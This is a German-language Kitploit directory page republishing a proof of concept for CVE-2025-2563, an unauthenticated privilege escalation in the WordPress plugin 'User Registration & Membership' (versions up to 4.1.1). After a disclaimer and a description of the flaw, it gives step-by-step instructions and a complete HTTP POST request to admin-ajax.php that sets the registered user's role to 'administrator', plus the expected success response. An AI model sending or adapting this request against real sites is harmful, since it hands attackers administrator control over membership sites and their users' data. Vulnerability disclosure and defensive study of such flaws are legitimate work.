Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2563 — CVE-2025-2563 PoC | Kitploit
Tools/GitHubGitHub/ubaydev/cve-2025-2563
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHububaydev/cve-2025-2563

CVE-2025-2563

CVE-2025-2563 PoC

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2563

User Registration & Membership <= 4.1.1 - Nicht authentifizierte Privilegieneskalation

Haftungsausschluss!

Die in dieser CVE (Common Vulnerabilities and Exposures) Zusammenfassung dargestellten Informationen dienen ausschließlich Bildungs- und Informationszwecken. Die bereitgestellten Details basieren auf öffentlich zugänglichen Ressourcen, Recherchen und Analysen des Autors. Der Inhalt ist nicht dazu gedacht, illegale Aktivitäten, einschließlich Hacking, Ausnutzung oder unbefugtem Zugriff auf Systeme, zu fördern oder zu ermutigen.

Der Autor übernimmt keinerlei Verantwortung für einen Missbrauch der dargestellten Informationen. Es wird empfohlen, dass Einzelpersonen und Organisationen dieses Wissen verantwortungsvoll und in Übereinstimmung mit den geltenden Gesetzen und Vorschriften anwenden. Leser werden nachdrücklich aufgefordert, Schwachstellen nur in kontrollierten Umgebungen mit entsprechender Genehmigung zu testen.

Der Autor und die Mitwirkenden dieser Zusammenfassung unterstützen keine böswilligen Aktivitäten und befürworten eine verantwortungsvolle Offenlegung sowie ethische Hacking-Praktiken.


Beschreibung

Eine kritische Sicherheitslücke wurde im WordPress-Plugin „User Registration & Membership“ entdeckt, einem beliebten Tool zur Erstellung von Mitgliedschaftsseiten und Registrierungsformularen. Der Fehler, identifiziert als CVE-2025-2563, hat einen CVSS-Score von 9,8, was auf seine hohe Schwere hindeutet.

Das User Registration & Membership Plugin für WordPress ist in Versionen bis einschließlich 4.1.1 anfällig für eine Privilegieneskalation. Dies liegt an unzureichenden Einschränkungen des Rollentyps in der Funktion 'prepare_members_data()'. Dies ermöglicht es nicht authentifizierten Angreifern, neue Benutzerkonten mit der Rolle 'Administrator' zu erstellen, unter folgenden Bedingungen:

  1. Das Plugin hat das Mitgliedschafts-Add-on aktiviert
  2. Der registrierte Benutzer benötigt keine Bestätigung

PoC (Proof of Concept)

  1. Registrieren Sie sich über die Frontend-Seite unter /registration oder /membership-registration
  2. Nach der Registrierung verwenden Sie diese Anfragedaten.
    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: */*
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
    
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_register_member
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="security"
    
    THE_NONCE_HERE
    ----------------------------189123966817005614765335
    Content-Disposition: form-data; name="members_data"
    
    {"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
    ----------------------------189123966817005614765335--
    
  3. Die Antwort sollte wie folgt aussehen
    root@kitploit:~
    {
        "success": true,
        "data": {
            "member_id": 24,
            "transaction_id": "",
            "message": "New member has been successfully created."
        }
    }  
    
  4. Sie können sich nun mit dem registrierten Konto und Administratorrechten anmelden.

Referenzen

  1. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
  2. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
  3. https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/

Danke

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
Tool herunterladen